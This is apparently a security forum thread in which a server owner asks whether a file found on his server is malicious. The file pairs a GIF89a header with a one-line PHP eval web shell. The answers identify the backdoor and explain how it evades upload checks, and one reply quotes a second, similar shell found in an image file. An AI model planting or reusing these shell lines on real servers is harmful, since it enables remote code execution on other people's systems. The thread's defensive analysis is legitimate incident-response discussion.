6

I found this file on my server, it contains the following code:

GIF89a
<?php eval ($_POST[plm12345plm]); ?>

There is no other code beside that one above. Is this malicious?

Steve Dodier-Lazaro
  • 6,828
  • 29
  • 45
Ben Bibikov
  • 79
  • 1
  • 1
  • 3

3 Answers3

15

Yes, this is rogue. This script will execute any PHP code passed as plm12345plm POST parameter. This means, an attacker can execute arbitrary PHP and -- depending on the server configuration -- further code on your server.

The first GIF89a line is likely placed to bypass basic file verification during upload of the script as a GIF image.

If the file could actually be executed, consider the server as compromised. If it is not executable directly, it still could be exploited using local file inclusion attacks.

Jens Erat
  • 23,816
  • 12
  • 75
  • 96
6

Yes, this is a PHP web shell. Eval should be the red flag.

Basically, if the user can access this file on your server, they may be able to execute OS commands. If you have properly implemented your site, the attacker should not be able to trick PHP into executing the code in what I am assuming is a .GIF file.

However, if I were you I would batten down the hatches and start your incident response procedures. Someone definitely attempted to break in, and without further research, you wont know if they succeeded.

MrSynAckSter
  • 2,040
  • 10
  • 16
  • Yes, the site has been compromised. I'm trying to find the problem. First, the index.php at Wordpress root folder always gets rewritten, with bunch of website links. I delete the links, the file still gets rewritten after a week or so. Another problem is that my site gets indexed by google with Japanese characters. Not sure how to fix those two issues. – Ben Bibikov May 04 '15 at 21:47
  • 2
    I would backup your site, and start from scratch. Nuke em from space, it's the only way to be sure. – MrSynAckSter May 04 '15 at 21:48
  • Look up the link above from Jens. You're not addressing the problem if you just remove whatever is being added, because you keep getting compromised. Either the attackers have a reliable exploit for your site (indicating a mistake in your coding or out-of-date software) or they execute a script via a file like the one above on a regular basis to deface your site. In any case, read Jens's link. – Steve Dodier-Lazaro May 04 '15 at 21:56
-1

My server was hacked with the same method. My Server ISP saw huge netload and took the server offline and informed me.

File ali.jpg has textual code: GIF89a?lovealihack <?php eval($_POST[alihackxx])?>

This file was waiting at least since begin 2015 (I traced it back in my backups). It is located in the writable site URL/userfiles/Image directory. When it is called from an outside form with variable alihackxx and method POST containing PHP code in the variable the Apache Server will execute it as www-data user and it contaminated ALL the sites with a writable directory Media, FILE and lot of JPG and PHP files to attack on other servers.

It is most likely caused by the (old) FCKeditor I use on all sites, which allows the user to upload a picture that will be inserted in the users site page. There is also a way of pushing data in a writable site/writable directory via the PUT method. It is possible to turn the usage of this method off.

Immediate solution/prevention:
I am shocked to see such a simple vulnerability. I have bad feelings about being hacked. I changed all (site URL) 777 (writable directories) to 755 only writable for FTP/server user, so Apache (www-data user) cannot write in it anymore.

ToDo's:
My customers still need to upload JPGs, MP3s and PDFs. They must pass a proper upload gateway that reads the file for malicious <?php and the eval(

Also no fun to adjust the mail forms with file attachments. It is important that the file attachment should not be in a site URL/writable directory.

I hope I informed you guys about this server hack and hope you can prevent your server being hacked.

schroeder
  • 125,553
  • 55
  • 289
  • 326